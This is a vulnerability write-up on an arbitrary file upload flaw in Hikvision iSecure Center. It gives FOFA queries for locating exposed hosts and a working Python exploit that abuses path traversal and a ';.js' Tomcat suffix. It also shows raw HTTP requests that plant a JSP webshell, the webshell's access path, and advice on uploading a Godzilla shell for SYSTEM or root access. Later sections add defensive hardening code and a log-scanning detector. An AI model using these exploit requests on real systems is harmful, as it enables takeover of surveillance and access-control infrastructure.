2023Hvv/海康卫视前台上传.md
2023-08-11 09:51:54 +08:00

**2. Vulnerability description**
HIKVISION iSecure Center is an "integrated", "intelligent" security management platform. It connects devices from video surveillance, access-card, parking and alarm-detection systems, collects data from those edge nodes, integrates and links the resulting security information, and, with an electronic map as the carrier, fuses the capabilities of each subsystem into intelligent applications. The platform is designed around a "unified software technology architecture" and uses business componentisation so it can scale elastically. It targets general integrated security use across industries, consolidating the resources of each subsystem under unified deployment, configuration, management and scheduling. The Hikvision iSecure Center integrated security management platform contains an arbitrary file upload vulnerability.
**3. Affected versions**
HIKVISION iSecure Center integrated security management platform, versions found in the wild (no exact version range is given).
**4. FOFA query**
icon_hash="-808437027"
app="HIKVISION-iSecure-Center"
## **5. Vulnerability reproduction**
The EXP/POC payload.py script sends everything through a proxy on 127.0.0.1:8080 so Burp Suite can capture the traffic.
```
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# POC for the Hikvision iSecure Center /center/api/files arbitrary file upload.
# Uploads a harmless .txt with random content via path traversal, then reads it back.
import sys
import requests
import string
import random
import urllib3

urllib3.disable_warnings()

# Route everything through 127.0.0.1:8080 so Burp Suite can capture the packets
proxies = {
    'http': 'http://127.0.0.1:8080',
    'https': 'http://127.0.0.1:8080',
}


def run(arg):
    # arg is the target base URL, e.g. https://x.x.x.x/ (a trailing '/' is required)
    if not arg.endswith('/'):
        arg += '/'
    try:
        flag = ''.join(random.choices(string.ascii_uppercase + string.digits, k=9))
        filename = ''.join(random.choices(string.ascii_uppercase + string.digits, k=10))
        # ';.js' is a Tomcat path parameter: the request is still routed to /center/api/files
        vuln_url = arg + "center/api/files;.js"
        # The multipart filename carries the traversal that drops the file into the
        # clusterMgr webapp. requests builds the multipart body and its Content-Type
        # itself, so no headers are set by hand here.
        file = {'file': (f'../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/{filename}.txt',
                         flag, 'application/octet-stream')}
        r = requests.post(vuln_url, files=file, timeout=15, verify=False, proxies=proxies)
        if r.status_code == 200 and "webapps/clusterMgr" in r.text:
            # Fetch the file back through the same ';.js' trick to confirm the write
            payload = f"clusterMgr/{filename}.txt;.js"
            url = arg + payload
            r2 = requests.get(url, timeout=15, verify=False, proxies=proxies)
            if r2.status_code == 200 and flag in r2.text:
                print('\033[1;31;40m')
                print(arg + f": vulnerable, Hikvision iSecure Center arbitrary file upload\nshell address {url}")
                print('\033[0m')
                return
        print(arg + ": not vulnerable")
    except Exception as e:
        print(arg + ": not vulnerable (" + str(e) + ")")


if __name__ == '__main__':
    url = sys.argv[1]
    run(url)
```
## **6. Burp Suite capture analysis**
Burp Suite listening on 127.0.0.1:8080 captures two packets: one POST and one GET.
Payload request packet
```
POST /center/api/files;.js HTTP/1.1
Host: x.x.x.x
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Length: 258
Content-Type: multipart/form-data; boundary=e54e7e5834c8c50e92189959fe7227a4

--e54e7e5834c8c50e92189959fe7227a4
Content-Disposition: form-data; name="file"; filename="../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/2BT5AV96QW.txt"
Content-Type: application/octet-stream

9YPQ3I3ZS
--e54e7e5834c8c50e92189959fe7227a4--
```
**Response to the payload.**
```
HTTP/1.1 200
Server: openresty/1.13.6.2
Date: Fri, 14 Jul 2023 04:35:23 GMT
Content-Type: application/json;charset=UTF-8
Content-Length: 335
Connection: close
Set-Cookie: JSESSIONID=0A235873FB1C02C345345C0D36A4C709; Path=/center; HttpOnly
Content-Language: en_US
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: 0
Content-Disposition: inline;filename=f.txt

{"code":"0","data":{"filename":"../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/
```
Open the link https://x.x.x.x/clusterMgr/2BT5AV96QW.txt;.js to check whether the upload succeeded.
Because the Hikvision platform runs on Tomcat, changing the request body and the file name lets you upload a Godzilla-generated JSP instead of the test .txt.
Both Windows and Linux hosts are exploitable: on Windows the resulting account is SYSTEM, on Linux it is root.
Post-exploitation (Hikvision account password management): Hikvision integrated security platform post-exploitation techniques.
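To make the two tricks in these packets concrete, here is an added example in Python; it is not code from this page or from Hikvision. It approximates how Tomcat maps a request URI to a resource, stripping the `;...` path parameter from each segment before collapsing `..`, which is why `/center/api/files;.js` reaches the upload API while a suffix-based front-end rule sees a static `.js` file, and why the `..;/` segments in the eportal shell path given at the end of this page collapse away. It then contrasts an upload handler that trusts the multipart filename with a hardened one. `UPLOAD_ROOT`, the extension allowlist and the function names are assumptions for illustration; the directory `/center/api/files` really writes to is not stated on the page.

```python
import posixpath
import re

# Assumed upload directory for illustration; where /center/api/files actually
# writes is not stated on the page.
UPLOAD_ROOT = "/opt/hikvision/data/upload"
ALLOWED_EXT = {".txt", ".png", ".jpg", ".pdf"}          # assumed allowlist
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,127}")


def tomcat_request_path(uri: str) -> str:
    """Approximate Tomcat's mapping of a request URI to the resource it serves.

    Tomcat treats ';...' at the end of a path segment as path parameters (the
    mechanism behind ';jsessionid=...'), removes them before matching, and
    then collapses '.' and '..'. A front-end rule keyed on the raw suffix
    ('.js', '.html') or prefix ('/portal/ui/login/') therefore sees a
    different path from the one Tomcat resolves.
    """
    path = uri.split("?", 1)[0]
    stripped = "/".join(seg.split(";", 1)[0] for seg in path.split("/"))
    return posixpath.normpath(stripped)


def vulnerable_save_path(client_filename: str) -> str:
    """Where a handler that trusts the multipart filename ends up writing."""
    return posixpath.normpath(posixpath.join(UPLOAD_ROOT, client_filename))


def hardened_save_path(client_filename: str) -> str:
    """Same input, but the client controls only a sanitised basename."""
    # 1. Keep the last path component only; treat backslashes as separators too.
    name = posixpath.basename(client_filename.replace("\\", "/"))
    # 2. Allowlist the characters, which also rejects ';', NUL, '..' and spaces.
    if not SAFE_NAME.fullmatch(name):
        raise ValueError(f"rejected filename {client_filename!r}")
    # 3. Allowlist the extension so no .jsp can be written even if a later
    #    check were bypassed.
    if posixpath.splitext(name)[1].lower() not in ALLOWED_EXT:
        raise ValueError(f"rejected extension in {name!r}")
    # 4. Defence in depth: verify the final path is still inside UPLOAD_ROOT.
    #    Production code should use os.path.realpath here so a symlink planted
    #    inside the upload directory cannot redirect the write.
    root = posixpath.normpath(UPLOAD_ROOT)
    dest = posixpath.normpath(posixpath.join(root, name))
    if posixpath.commonpath([root, dest]) != root:
        raise ValueError(f"{dest!r} escapes {root!r}")
    return dest


if __name__ == "__main__":
    for uri in ("/center/api/files;.js",
                "/clusterMgr/2BT5AV96QW.txt;.js",
                "/portal/ui/login/..;/..;/new.jsp"):
        print(f"{uri:40} -> {tomcat_request_path(uri)}")
    poc_name = "../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/2BT5AV96QW.txt"
    print("vulnerable:", vulnerable_save_path(poc_name))
    print("hardened:  ", hardened_save_path(poc_name))
    try:
        hardened_save_path("../../../webapps/eportal/new.jsp")
    except ValueError as e:
        print("hardened:  ", e)
```

The point of the basename-plus-allowlist order is that each step alone is weak: a basename strips the traversal but would still accept `new.jsp`, and an extension check alone would still accept the traversal. The `;` rejection in the character allowlist matters because a name such as `x.jsp;.txt` would otherwise pass the extension check and be served as a JSP if it ever landed under a webapp.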
**POC2**
```
POST /center/api/files;.html HTTP/1.1
Host: 10.10.10.10
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a

------WebKitFormBoundary9PggsiM755PLa54a
Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/new.jsp"
Content-Type: application/zip

<% JSP webshell goes here %>
------WebKitFormBoundary9PggsiM755PLa54a--
```
**report arbitrary file upload vulnerability**
```
POST /svm/api/external/report HTTP/1.1
Host: 10.10.10.10
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a

------WebKitFormBoundary9PggsiM755PLa54a
Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/new.jsp"
Content-Type: application/zip

<% JSP webshell goes here %>
------WebKitFormBoundary9PggsiM755PLa54a--
```
**Webshell path: /portal/ui/login/..;/..;/new.jsp**
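For the detection side, an added example that is not part of the original page: a scanner over constructed openresty-style access-log lines that flags the indicators visible in the packets above, namely a `;` path parameter on a URI segment, `..;` traversal, and POSTs that Tomcat will route to either upload endpoint regardless of the suffix appended. The log lines are modelled on the packets on this page but are constructed for the example, and the endpoint list is an assumption to adjust for your deployment.

```python
import re
from urllib.parse import unquote

# Constructed openresty/nginx combined-format lines modelled on the packets
# above; they are not from a real system.
SAMPLE_LOG = """\
10.0.0.5 - - [14/Jul/2023:04:35:23 +0000] "POST /center/api/files;.js HTTP/1.1" 200 335 "-" "python-requests/2.31.0"
10.0.0.5 - - [14/Jul/2023:04:35:24 +0000] "GET /clusterMgr/2BT5AV96QW.txt;.js HTTP/1.1" 200 9 "-" "python-requests/2.31.0"
10.0.0.9 - - [14/Jul/2023:05:01:02 +0000] "POST /svm/api/external/report HTTP/1.1" 200 120 "-" "Mozilla/5.0"
10.0.0.9 - - [14/Jul/2023:05:01:05 +0000] "GET /portal/ui/login/..;/..;/new.jsp?cmd=id HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [14/Jul/2023:05:02:00 +0000] "GET /portal/ui/login/index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.0.7 - - [14/Jul/2023:05:02:01 +0000] "GET /center/api/files/123 HTTP/1.1" 200 77 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Endpoints this page shows accepting multipart uploads (assumed list; extend as needed)
UPLOAD_ENDPOINTS = {"/center/api/files", "/svm/api/external/report"}


def routed_path(target: str) -> str:
    """Path as Tomcat will route it: query dropped, ';...' path parameters removed."""
    path = unquote(target.split("?", 1)[0])
    return re.sub(r";[^/]*", "", path)


def indicators(method: str, target: str) -> list:
    """Return the list of suspicious traits of one request, in a fixed order."""
    path = unquote(target.split("?", 1)[0])
    hits = []
    if "..;" in path:
        hits.append("'..;' traversal")
    if re.search(r";[^/]*(?:/|$)", path):
        hits.append("path parameter in URI")
    if method == "POST" and routed_path(target).rstrip("/") in UPLOAD_ENDPOINTS:
        hits.append("upload endpoint POST")
    return hits


def scan_log(text: str) -> list:
    """Parse combined-format lines and keep those with at least one indicator."""
    alerts = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        hits = indicators(m["method"], m["target"])
        if hits:
            alerts.append({"src": m["src"], "ts": m["ts"], "method": m["method"],
                           "target": m["target"], "status": m["status"],
                           "indicators": hits})
    return alerts


if __name__ == "__main__":
    for a in scan_log(SAMPLE_LOG):
        print(f'{a["ts"]} {a["src"]} {a["method"]} {a["target"]} -> {", ".join(a["indicators"])}')
```

Matching on the routed path rather than the raw URI is what keeps the rule from being evaded by swapping `;.js` for `;.html` or any other suffix, while the plain GET to `/center/api/files/123` and the normal `/portal/ui/login/index.html` request in the sample produce no alert. Pair the endpoint hit with the multipart filename from the request body (if your reverse proxy logs it) to confirm traversal in the upload itself.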